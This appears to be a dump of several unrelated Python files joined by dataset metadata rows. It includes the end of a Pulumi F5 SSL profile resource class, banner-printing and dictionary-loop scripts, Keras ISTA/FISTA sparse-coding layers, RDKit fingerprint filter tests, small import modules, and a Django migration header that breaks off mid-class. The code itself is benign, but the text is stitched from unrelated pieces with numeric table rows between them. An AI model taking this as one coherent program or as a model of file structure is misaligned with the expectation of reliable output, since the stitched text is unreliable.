def ssl_forward_proxy(self) -> pulumi.Output[str]:
"""
Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy")
@property
@pulumi.getter(name="sslForwardProxyBypass")
def ssl_forward_proxy_bypass(self) -> pulumi.Output[str]:
"""
Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
"""
return pulumi.get(self, "ssl_forward_proxy_bypass")
@property
@pulumi.getter(name="sslSignHash")
def ssl_sign_hash(self) -> pulumi.Output[str]:
"""
SSL sign hash (any, sha1, sha256, sha384)
"""
return pulumi.get(self, "ssl_sign_hash")
@property
@pulumi.getter(name="strictResume")
def strict_resume(self) -> pulumi.Output[str]:
"""
Enables or disables the resumption of SSL sessions after an unclean shutdown. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "strict_resume")
@property
@pulumi.getter(name="tmOptions")
def tm_options(self) -> pulumi.Output[Sequence[str]]:
"""
List of enabled selections from a set of industry-standard options for handling SSL processing. By default,
"Don't insert empty fragments" and "No TLSv1.3" are listed as enabled options. Usage: `tm_options = ["dont-insert-empty-fragments", "no-tlsv1.3"]`
"""
return pulumi.get(self, "tm_options")
@property
@pulumi.getter(name="uncleanShutdown")
def unclean_shutdown(self) -> pulumi.Output[str]:
"""
Unclean Shutdown (enabled / disabled)
"""
return pulumi.get(self, "unclean_shutdown")
| 51.213974 | 393 | 0.677169 | 17,430 | 140,736 | 5.255995 | 0.022834 | 0.090054 | 0.097651 | 0.10086 | 0.978191 | 0.97473 | 0.968356 | 0.965419 | 0.964382 | 0.948151 | 0 | 0.002033 | 0.227468 | 140,736 | 2,747 | 394 | 51.232617 | 0.840586 | 0.354749 | 0 | 0.936556 | 1 | 0 | 0.109837 | 0.030796 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170393 | false | 0.077341 | 0.00423 | 0.001813 | 0.276737 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 9 |
8df2a2bc5aeb7b8beed076eade360db0ca9f360b | 211 | py | Python | Selenium-IFTTT/__init__.py | be9concepts/AWS-Selenium-Service | 05a9c4eff68c99ac0075b6ae78df9785d1913751 | [
"MIT"
] | null | null | null | Selenium-IFTTT/__init__.py | be9concepts/AWS-Selenium-Service | 05a9c4eff68c99ac0075b6ae78df9785d1913751 | [
"MIT"
] | null | null | null | Selenium-IFTTT/__init__.py | be9concepts/AWS-Selenium-Service | 05a9c4eff68c99ac0075b6ae78df9785d1913751 | [
"MIT"
] | null | null | null | print('------------------Selenium Web Service-------------------')
print('----------------Developed by Be9Concepts-----------------')
print('')
print('+++++++++++++++++++++Service Started+++++++++++++++++++++')
| 42.2 | 66 | 0.350711 | 12 | 211 | 6.166667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004951 | 0.042654 | 211 | 4 | 67 | 52.75 | 0.361386 | 0 | 0 | 0 | 0 | 0 | 0.810427 | 0.763033 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
30992d732771e406628f37276805ab20c8914576 | 322 | py | Python | PythonNotes/PythonBasics/Loops/LoopingThruADictionary.py | minefarmer/PythonMega | 1b22f6648ca7a9711853aaa909558d49416d4fd7 | [
"Unlicense"
] | null | null | null | PythonNotes/PythonBasics/Loops/LoopingThruADictionary.py | minefarmer/PythonMega | 1b22f6648ca7a9711853aaa909558d49416d4fd7 | [
"Unlicense"
] | null | null | null | PythonNotes/PythonBasics/Loops/LoopingThruADictionary.py | minefarmer/PythonMega | 1b22f6648ca7a9711853aaa909558d49416d4fd7 | [
"Unlicense"
] | null | null | null | student_grades = {"Mary": 9.1, "Sam": 8.8, "John": 7.5}
# for grades in student_grades.items():
# print(grades) # ('Mary', 9.1)
# # ('Sam', 8.8)
# # ('John', 7.5)
for grades in student_grades.values():
print(grades) # 9.1
# 8.8
# 7.5
| 26.833333 | 55 | 0.425466 | 42 | 322 | 3.190476 | 0.357143 | 0.291045 | 0.164179 | 0.179104 | 0.701493 | 0.701493 | 0.701493 | 0.701493 | 0.701493 | 0.701493 | 0 | 0.091371 | 0.388199 | 322 | 11 | 56 | 29.272727 | 0.588832 | 0.465839 | 0 | 0 | 0 | 0 | 0.068323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
30f40c2b7b91a297cf31fb6cdf0db053631d4681 | 21,711 | py | Python | keras/src/layers/ista_fista_layers.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 8 | 2020-09-27T09:04:07.000Z | 2021-10-06T15:23:06.000Z | keras/src/layers/ista_fista_layers.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 5 | 2020-07-27T14:31:05.000Z | 2022-02-10T02:17:50.000Z | keras/src/layers/ista_fista_layers.py | btolooshams/crsae | fabc474202b8489ff3818c6258bcd81fb3e39b19 | [
"MIT"
] | 1 | 2021-02-22T10:56:26.000Z | 2021-02-22T10:56:26.000Z | """
Copyright (c) 2020 Bahareh Tolooshams
Custom layer to do ISTA or FISTA for convolutional dictionary.
:author: Bahareh Tolooshams
"""
from keras import backend as K
from keras.layers import Conv1D, Conv2D, InputSpec, Dense, Reshape
from keras.initializers import (
Identity,
Initializer,
Constant,
Ones,
Zeros,
RandomNormal,
)
from keras.activations import relu
from keras.constraints import non_neg
import numpy as np
import tensorflow as tf
class ISTA_1d(Conv1D):
"""
ISTA layer for tied convolutional weights (H,HT) 1d case.
"""
def __init__(
self, tied_layer, y, L, lambda_trainable, twosided, num_iterations, **kwargs
):
"""
Constructor
:param tied_layer: Conv1D layer that is used as HT.
:param y: input data
:param L: 1/L is the step size from ISTA
:param lambda_trainable: set True for lambda to be trainable
:param twosided: set True for twosided relu
:param num_iterations: max number of iterations of ISTA
:param kwargs:
"""
self.tied_layer = tied_layer
# The output dimension is the output dimension of the tied layer
self.output_dim1 = tied_layer.output_shape[-2]
self.output_dim2 = tied_layer.output_shape[-1]
self.kernel_size = self.tied_layer.kernel_size
self.y = y
self.L = L
self.lambda_trainable = lambda_trainable
self.twosided = twosided
self.num_iterations = num_iterations
super().__init__(
(self.output_dim1, self.output_dim2),
self.kernel_size,
activation="relu",
**kwargs
)
def build(self, input_shape):
# Set the input dimensions as the output dimension of the conv layer
assert len(input_shape) >= 2
self.num_data = input_shape[0]
self.input_dim = self.tied_layer.output_shape[-1]
self.input_spec = [InputSpec(min_ndim=2, axes={-1: self.input_dim})]
# Set kernel from the tied layer as flipped
self.kernel = K.reverse(self.tied_layer.kernel, axes=0)
self.kernel = K.reshape(
self.kernel, (self.kernel_size[0], self.tied_layer.output_shape[2], 1)
)
# Set bias from the lambda_value
self.bias = self.add_weight(
shape=(self.tied_layer.output_shape[2],),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
# Have to set build to True
self.built = True
def call(self, z):
def ista_iteration(z_old, ctr):
"""
ISTA iteration
:param z_old: sparse code from the previous iteration
:param ctr: counter to monitor the iteration
:return: z_new, ctr+1
"""
# zero-pad
paddings = tf.constant(
[[0, 0], [self.kernel_size[0] - 1, self.kernel_size[0] - 1], [0, 0]]
)
z_pad = tf.pad(z_old, paddings, "CONSTANT")
# Hz
H_z_old = K.conv1d(z_pad, self.kernel, padding="valid")
# take residuals
res = tf.add(self.y, -H_z_old)
# convolve with HT
HT_res = K.conv1d(res, self.tied_layer.kernel, padding="valid")
# divide by L
HT_res_L = tf.multiply(HT_res, 1 / self.L)
# get new z before shrinkage
pre_z_new = tf.add(z_old, HT_res_L)
# soft-thresholding
# multiply lambda / L to be the bias
bias_with_L = self.lambda_value / self.L
bias_with_L = tf.cast(bias_with_L, tf.float32)
bias_vector = tf.add(
bias_with_L[0], tf.zeros((self.output_dim1, 1), dtype=tf.float32)
)
# apply a different bias for each convolution kernel
for n in range(self.output_dim2 - 1):
temp = tf.add(
bias_with_L[n + 1],
tf.zeros((self.output_dim1, 1), dtype=tf.float32),
)
bias_vector = tf.concat([bias_vector, temp], axis=1)
# add bias
output_pos = K.bias_add(pre_z_new, -1 * bias_vector)
if self.twosided:
output_neg = K.bias_add(pre_z_new, bias_vector)
# shrinkage
output_pos = self.activation(output_pos)
if self.twosided:
output_neg = -1 * self.activation(-1 * output_neg)
if self.twosided:
output = output_pos + output_neg
else:
output = output_pos
z_new = output
return z_new, ctr + 1
def cond(z, ctr):
"""
condition to monitor the maximum number of iterations
:param z: sparse code
:param ctr: counter to monitor the iteration
:return: boolean, True if ctr < num_iterations
"""
return tf.less(ctr, self.num_iterations)
# initialize the while loop variables
loop_vars = (z, 0)
# perform ISTA
output = tf.while_loop(cond, ista_iteration, loop_vars, parallel_iterations=1)
return output[0]
def compute_output_shape(self, input_shape):
# Note output dim was set to the other layers input dim in the constructor
return input_shape[0], self.output_dim1, self.output_dim2
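The body of `ista_iteration` above computes a residual `y - Hz`, correlates it with `HT`, steps by `1/L`, and then soft-thresholds. The same update can be sketched for a scalar toy problem in plain Python; `shrink` and `ista_scalar` are hypothetical helpers, not part of the layer:

```python
def shrink(x, thresh):
    """Soft-thresholding: sign(x) * max(|x| - thresh, 0)."""
    if x > thresh:
        return x - thresh
    if x < -thresh:
        return x + thresh
    return 0.0

def ista_scalar(y, lam, L=1.0, h=1.0, num_iterations=50):
    """Scalar ISTA sketch for 0.5*(y - h*z)^2 + lam*|z| (toy problem)."""
    z = 0.0
    for _ in range(num_iterations):
        residual = y - h * z                        # res = y - Hz
        z = shrink(z + h * residual / L, lam / L)   # gradient step + shrinkage
    return z
```

With `h = L = 1`, the fixed point is `shrink(y, lam)`, which makes the shrinkage behavior easy to check by hand.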
class FISTA_1d(Conv1D):
"""
FISTA layer for tied convolutional weights (H,HT) 1d case.
"""
def __init__(
self,
tied_layer,
y,
L,
lambda_trainable,
twosided,
num_iterations,
lambda_single=False,
lambda_EM=False,
**kwargs
):
"""
Constructor
:param tied_layer: Conv1D layer that is used as HT.
:param y: input data
:param L: 1/L is the step size from FISTA
:param lambda_trainable: set True for lambda to be trainable
:param twosided: set True for twosided relu
:param num_iterations: max number of iterations of FISTA
:param lambda_single: True for sharing one lambda for all filters
:param lambda_EM: False for backprop, True for closed-form given code
:param kwargs:
"""
self.tied_layer = tied_layer
# The output dimension is the output dimension of the tied layer
self.output_dim1 = tied_layer.output_shape[-2]
self.output_dim2 = tied_layer.output_shape[-1]
self.kernel_size = self.tied_layer.kernel_size
self.y = y
self.L = L
self.lambda_trainable = lambda_trainable
self.twosided = twosided
self.num_iterations = num_iterations
self.lambda_single = lambda_single
self.lambda_EM = lambda_EM
super().__init__(
(self.output_dim1, self.output_dim2),
self.kernel_size,
activation="relu",
**kwargs
)
def build(self, input_shape):
# Set the input dimensions as the output dimension of the conv layer
assert len(input_shape) >= 2
self.num_data = input_shape[0]
self.input_dim = self.tied_layer.output_shape[-1]
self.input_spec = [InputSpec(min_ndim=2, axes={-1: self.input_dim})]
# Set kernel from the tied layer as flipped
self.kernel = K.reverse(self.tied_layer.kernel, axes=0)
self.kernel = K.reshape(
self.kernel, (self.kernel_size[0], self.tied_layer.output_shape[2], 1)
)
# Set bias from the lambda_value
if self.lambda_single:
self.bias = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
else:
self.bias = self.add_weight(
shape=(self.tied_layer.output_shape[2],),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
# noiseSTD
self.noiseSTD = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="noiseSTD",
regularizer=self.bias_regularizer,
trainable=False,
constraint=non_neg(),
)
# Have to set build to True
self.built = True
def call(self, z):
def fista_iteration(z_old, x_old, s_old, ctr):
"""
FISTA iteration
:param z_old: sparse code from the previous iteration
:param x_old: the new point used in FISTA
:param s_old: s variable used in FISTA
:param ctr: counter to monitor the iteration
:return: z_new, x_new, s_new, ctr+1
"""
s_new = (1.0 + tf.sqrt(1.0 + 4.0 * s_old * s_old)) / 2.0
# zero-pad
paddings = tf.constant(
[[0, 0], [self.kernel_size[0] - 1, self.kernel_size[0] - 1], [0, 0]]
)
x_pad = tf.pad(x_old, paddings, "CONSTANT")
# Hx
H_x_old = K.conv1d(x_pad, self.kernel, padding="valid")
# take residuals
res = tf.add(self.y, -H_x_old)
# convolve with HT
HT_res = K.conv1d(res, self.tied_layer.kernel, padding="valid")
# divide by L
HT_res_L = tf.multiply(HT_res, 1 / self.L)
# get new z before shrinkage
pre_z_new = tf.add(x_old, HT_res_L)
# soft-thresholding
# multiply lambda / L to be the bias
if self.lambda_single:
bias_with_L = tf.zeros((self.tied_layer.output_shape[2],)) + (
(self.bias * (self.noiseSTD ** 2)) / self.L
)
else:
bias_with_L = (self.bias * (self.noiseSTD ** 2)) / self.L
bias_with_L = tf.cast(bias_with_L, tf.float32)
bias_vector = tf.add(
bias_with_L[0], tf.zeros((self.output_dim1, 1), dtype=tf.float32)
)
# apply a different bias for each convolution kernel
for n in range(self.output_dim2 - 1):
temp = tf.add(
bias_with_L[n + 1],
tf.zeros((self.output_dim1, 1), dtype=tf.float32),
)
bias_vector = tf.concat([bias_vector, temp], axis=1)
# add bias
output_pos = K.bias_add(pre_z_new, -1 * bias_vector)
if self.twosided:
output_neg = K.bias_add(pre_z_new, bias_vector)
# shrinkage
output_pos = self.activation(output_pos)
if self.twosided:
output_neg = -1 * self.activation(-1 * output_neg)
if self.twosided:
output = output_pos + output_neg
else:
output = output_pos
# get z_new
z_new = output
# get x_new point from z_new
z_new_z_old_res = tf.add(z_new, -1 * z_old)
t_z_new_z_old_res = tf.multiply(z_new_z_old_res, (s_old - 1.0) / s_new)
x_new = tf.add(z_new, t_z_new_z_old_res)
return z_new, x_new, s_new, ctr + 1
def cond(z, x, s, ctr):
"""
condition to monitor the maximum number of iterations
:return: boolean, True if ctr < num_iterations
"""
return tf.less(ctr, self.num_iterations)
# initialize s
s = 1.0
# initialize the while loop variables
loop_vars = (z, z, s, 0)
# perform FISTA
output = tf.while_loop(cond, fista_iteration, loop_vars, parallel_iterations=1)
if self.lambda_trainable:
if not self.lambda_EM:
lambda_term = tf.zeros((self.output_dim2))
lambda_term += self.bias
return [output[0], lambda_term]
else:
return output[0]
else:
return output[0]
def compute_output_shape(self, input_shape):
# Note output dim was set to the other layers input dim in the constructor
if self.lambda_trainable:
if not self.lambda_EM:
if self.lambda_single:
return [
(input_shape[0], self.output_dim1, self.output_dim2),
(input_shape[0], 1),
]
else:
return [
(input_shape[0], self.output_dim1, self.output_dim2),
(input_shape[0], self.output_dim2),
]
else:
return (input_shape[0], self.output_dim1, self.output_dim2)
else:
return (input_shape[0], self.output_dim1, self.output_dim2)
class FISTA_2d(Conv2D):
"""
FISTA layer for tied convolutional weights (H,HT) 2d case.
"""
def __init__(
self,
tied_layer,
y,
L,
lambda_trainable,
twosided,
num_iterations,
lambda_single=False,
lambda_EM=False,
**kwargs
):
"""
Constructor
:param tied_layer: Conv2D layer that is used as HT.
:param y: input data
:param L: 1/L is the step size from FISTA
:param lambda_trainable: set True for lambda to be trainable
:param twosided: set True for twosided relu
:param num_iterations: max number of iterations of FISTA
:param lambda_single: True for sharing one lambda for all filters
:param lambda_EM: False for backprop, True for closed-form given code
:param kwargs:
"""
self.tied_layer = tied_layer
# The output dimension is the output dimension of the tied layer
self.output_dim1 = tied_layer.output_shape[-3]
self.output_dim2 = tied_layer.output_shape[-2]
self.output_dim3 = tied_layer.output_shape[-1]
self.kernel_size = self.tied_layer.kernel_size
self.y = y
self.L = L
self.lambda_trainable = lambda_trainable
self.twosided = twosided
self.num_iterations = num_iterations
self.lambda_single = lambda_single
self.lambda_EM = lambda_EM
super().__init__(
(self.output_dim1, self.output_dim2, self.output_dim3),
self.kernel_size,
activation="relu",
**kwargs
)
def build(self, input_shape):
# Set the input dimensions as the output dimension of the conv layer
assert len(input_shape) >= 2
self.num_data = input_shape[0]
self.input_dim = self.tied_layer.output_shape[-1]
self.input_spec = [InputSpec(min_ndim=2, axes={-1: self.input_dim})]
# Set kernel from the tied layer
self.kernel = K.reverse(self.tied_layer.kernel, axes=0)
self.kernel = K.reverse(self.kernel, axes=1)
self.kernel = K.reshape(
self.kernel,
(
self.kernel_size[0],
self.kernel_size[1],
self.tied_layer.output_shape[-1],
1,
),
)
# Set bias from the lambda_value
if self.lambda_single:
self.bias = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
else:
self.bias = self.add_weight(
shape=(self.tied_layer.output_shape[3],),
initializer=self.bias_initializer,
name="lambda",
regularizer=self.bias_regularizer,
trainable=self.lambda_trainable,
constraint=non_neg(),
)
# noiseSTD
self.noiseSTD = self.add_weight(
shape=(1,),
initializer=self.bias_initializer,
name="noiseSTD",
regularizer=self.bias_regularizer,
trainable=False,
constraint=non_neg(),
)
# Have to set build to True
self.built = True
def call(self, z):
def fista_iteration(z_old, x_old, s_old, ctr):
"""
FISTA iteration
:param z_old: sparse code from the previous iteration
:param x_old: the new point used in FISTA
:param s_old: s variable used in FISTA
:param ctr: counter to monitor the iteration
:return: z_new, x_new, s_new, ctr+1
"""
s_new = (1.0 + tf.sqrt(1.0 + 4.0 * s_old * s_old)) / 2.0
# zero-pad
paddings = tf.constant(
[
[0, 0],
[self.kernel_size[0] - 1, self.kernel_size[0] - 1],
[self.kernel_size[1] - 1, self.kernel_size[1] - 1],
[0, 0],
]
)
x_pad = tf.pad(x_old, paddings, "CONSTANT")
# Hx
H_x_old = K.conv2d(x_pad, self.kernel, padding="valid")
# take residuals
res = tf.add(self.y, -H_x_old)
# convolve with HT
HT_res = K.conv2d(res, self.tied_layer.kernel, padding="valid")
# divide by L
HT_res_L = tf.multiply(HT_res, 1 / self.L)
# get new z before shrinkage
pre_z_new = tf.add(x_old, HT_res_L)
# soft-thresholding
# multiply lambda / L to be the bias
if self.lambda_single:
bias_with_L = tf.zeros((self.tied_layer.output_shape[3],)) + (
(self.bias * (self.noiseSTD ** 2)) / self.L
)
else:
bias_with_L = (self.bias * (self.noiseSTD ** 2)) / self.L
bias_with_L = tf.cast(bias_with_L, tf.float32)
bias_vector = tf.add(
bias_with_L[0],
tf.zeros((self.output_dim1, self.output_dim2, 1), tf.float32),
)
# apply a different bias for each convolution kernel
for n in range(self.output_dim3 - 1):
temp = tf.add(
bias_with_L[n + 1],
tf.zeros((self.output_dim1, self.output_dim2, 1), tf.float32),
)
bias_vector = tf.concat([bias_vector, temp], axis=2)
# add bias
output_pos = K.bias_add(pre_z_new, -1 * bias_vector)
if self.twosided:
output_neg = K.bias_add(pre_z_new, bias_vector)
# shrinkage
output_pos = self.activation(output_pos)
if self.twosided:
output_neg = -1 * self.activation(-1 * output_neg)
if self.twosided:
output = output_pos + output_neg
else:
output = output_pos
# get z_new
z_new = output
# get x_new point from z_new
z_new_z_old_res = tf.add(z_new, -1 * z_old)
t_z_new_z_old_res = tf.multiply(z_new_z_old_res, (s_old - 1.0) / s_new)
x_new = tf.add(z_new, t_z_new_z_old_res)
return z_new, x_new, s_new, ctr + 1
def cond(z, x, s, ctr):
"""
condition to monitor the maximum number of iterations
:return: boolean, True if ctr < num_iterations
"""
return tf.less(ctr, self.num_iterations)
# initialize s
s = 1.0
# initialize the while loop variables
loop_vars = (z, z, s, 0)
# perform FISTA
output = tf.while_loop(cond, fista_iteration, loop_vars, parallel_iterations=1)
if self.lambda_trainable:
if not self.lambda_EM:
lambda_term = tf.zeros((self.output_dim3))
lambda_term += self.bias
return [output[0], lambda_term]
else:
return output[0]
else:
return output[0]
def compute_output_shape(self, input_shape):
# Note output dim was set to the other layers input dim in the constructor
if self.lambda_trainable:
if not self.lambda_EM:
if self.lambda_single:
return [
(
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
),
(input_shape[0], 1),
]
else:
return [
(
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
),
(input_shape[0], self.output_dim3),
]
else:
return (
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
)
else:
return (
input_shape[0],
self.output_dim1,
self.output_dim2,
self.output_dim3,
)
| 36.427852 | 87 | 0.535996 | 2,640 | 21,711 | 4.19697 | 0.077273 | 0.046029 | 0.030505 | 0.032491 | 0.946119 | 0.942238 | 0.933484 | 0.925812 | 0.91444 | 0.913538 | 0 | 0.019437 | 0.376768 | 21,711 | 595 | 88 | 36.489076 | 0.799424 | 0.192944 | 0 | 0.780788 | 0 | 0 | 0.006693 | 0 | 0 | 0 | 0 | 0 | 0.007389 | 1 | 0.044335 | false | 0 | 0.017241 | 0.002463 | 0.123153 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a509c3106f644cb718926aba7ef7874947789733 | 670 | py | Python | tests/examples/test_stable_radical_molecule_state.py | harrysorensennrel/rlmolecule | 978269400b90f752bf4741f42f03522603b321e2 | [
"BSD-3-Clause"
] | 16 | 2020-12-28T21:45:09.000Z | 2022-03-19T12:03:58.000Z | tests/examples/test_stable_radical_molecule_state.py | harrysorensennrel/rlmolecule | 978269400b90f752bf4741f42f03522603b321e2 | [
"BSD-3-Clause"
] | 56 | 2020-12-30T16:12:33.000Z | 2022-02-02T18:32:44.000Z | tests/examples/test_stable_radical_molecule_state.py | harrysorensennrel/rlmolecule | 978269400b90f752bf4741f42f03522603b321e2 | [
"BSD-3-Clause"
] | 7 | 2021-01-05T01:34:04.000Z | 2021-09-29T13:42:44.000Z | import rdkit.Chem
def test_get_fingerprint():
from examples.stable_radical_optimization.stable_radical_molecule_state import FingerprintFilter
filter = FingerprintFilter()
mol = rdkit.Chem.MolFromSmiles(r'C/C(=C(C(/O)=C/[O])\C(C)(C)C)C(C)(C)C')
fps = set(filter.get_fingerprint(mol))
def test_filter():
from examples.stable_radical_optimization.stable_radical_molecule_state import FingerprintFilter
filter = FingerprintFilter()
mol = rdkit.Chem.MolFromSmiles(r'C/C(=C(C(/O)=C/[O])\C(C)(C)C)C(C)(C)C')
assert not filter.filter(mol)
mol = rdkit.Chem.MolFromSmiles(r'C/C(=C(C(/O)=C/[O])\C(C)(C)C)C(C)C')
assert filter.filter(mol)
| 35.263158 | 100 | 0.707463 | 107 | 670 | 4.299065 | 0.224299 | 0.126087 | 0.15 | 0.147826 | 0.758696 | 0.758696 | 0.758696 | 0.758696 | 0.732609 | 0.732609 | 0 | 0 | 0.122388 | 670 | 18 | 101 | 37.222222 | 0.782313 | 0 | 0 | 0.461538 | 0 | 0.230769 | 0.161194 | 0.161194 | 0 | 0 | 0 | 0 | 0.153846 | 1 | 0.153846 | false | 0 | 0.230769 | 0 | 0.384615 | 0.461538 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
eb7c209ba382e1d8ffc0f19e5af96a7ffc4313e5 | 197 | py | Python | web_wrapper/__init__.py | xtream1101/web-wrapper | 8fe0a07ed6d885b1321cb89471addf84845d80cf | [
"MIT"
] | null | null | null | web_wrapper/__init__.py | xtream1101/web-wrapper | 8fe0a07ed6d885b1321cb89471addf84845d80cf | [
"MIT"
] | null | null | null | web_wrapper/__init__.py | xtream1101/web-wrapper | 8fe0a07ed6d885b1321cb89471addf84845d80cf | [
"MIT"
] | 1 | 2018-08-01T14:36:17.000Z | 2018-08-01T14:36:17.000Z | from web_wrapper.driver_requests import DriverRequests
from web_wrapper.driver_selenium_chrome import DriverSeleniumChrome
from web_wrapper.driver_selenium_phantomjs import DriverSeleniumPhantomJS
| 49.25 | 73 | 0.923858 | 23 | 197 | 7.565217 | 0.521739 | 0.12069 | 0.241379 | 0.344828 | 0.321839 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060914 | 197 | 3 | 74 | 65.666667 | 0.940541 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
eb9ff9199f2bc331dc541f4397d992fcfc098afb | 95 | py | Python | src/zope/deferredimport/samples/sample6.py | zopefoundation/zope.deferredimport | cee860773a434a5a94b8c466e3d4ef2764f30d25 | [
"ZPL-2.1"
] | 5 | 2015-07-10T07:12:05.000Z | 2019-08-05T08:38:05.000Z | src/zope/deferredimport/samples/sample6.py | zopefoundation/zope.deferredimport | cee860773a434a5a94b8c466e3d4ef2764f30d25 | [
"ZPL-2.1"
] | 9 | 2015-02-01T18:08:43.000Z | 2021-12-10T08:15:11.000Z | src/zope/deferredimport/samples/sample6.py | zopefoundation/zope.deferredimport | cee860773a434a5a94b8c466e3d4ef2764f30d25 | [
"ZPL-2.1"
] | 1 | 2015-04-03T08:37:15.000Z | 2015-04-03T08:37:15.000Z |
import zope.deferredimport.sample5
def getone():
return zope.deferredimport.sample5.one
| 13.571429 | 42 | 0.778947 | 11 | 95 | 6.727273 | 0.727273 | 0.486486 | 0.675676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02439 | 0.136842 | 95 | 6 | 43 | 15.833333 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.666667 | 0.333333 | 1.333333 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 9 |
ebc62c85b61c1fe0af6fa8551ee9f72550580094 | 155 | py | Python | src/main.py | framlin/frinerva | 2aafc68c821438d1a6b753c7c3099a807af37842 | [
"MIT"
] | null | null | null | src/main.py | framlin/frinerva | 2aafc68c821438d1a6b753c7c3099a807af37842 | [
"MIT"
] | null | null | null | src/main.py | framlin/frinerva | 2aafc68c821438d1a6b753c7c3099a807af37842 | [
"MIT"
] | null | null | null | # from utils.utils import import_banking_csv_file
#
# import_banking_csv_file('../data/import/2019.csv')
from webserver import server
server.run_server()
| 22.142857 | 52 | 0.8 | 23 | 155 | 5.086957 | 0.478261 | 0.222222 | 0.273504 | 0.34188 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028369 | 0.090323 | 155 | 6 | 53 | 25.833333 | 0.801418 | 0.632258 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
693acbd98857ad0e250cf621c03537ffcd8b4a88 | 11,526 | py | Python | account/migrations/0001_initial.py | gibeongideon/daruapp | 20c454023674aeb66bf6c2880e81a8a00a4c92bc | [
"Unlicense",
"MIT"
] | 3 | 2021-05-26T12:38:22.000Z | 2021-06-26T12:49:29.000Z | account/migrations/0001_initial.py | gibeongideon/daruapp | 20c454023674aeb66bf6c2880e81a8a00a4c92bc | [
"Unlicense",
"MIT"
] | null | null | null | account/migrations/0001_initial.py | gibeongideon/daruapp | 20c454023674aeb66bf6c2880e81a8a00a4c92bc | [
"Unlicense",
"MIT"
] | 1 | 2021-05-04T05:45:26.000Z | 2021-05-04T05:45:26.000Z | # Generated by Django 3.1.7 on 2021-07-07 09:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
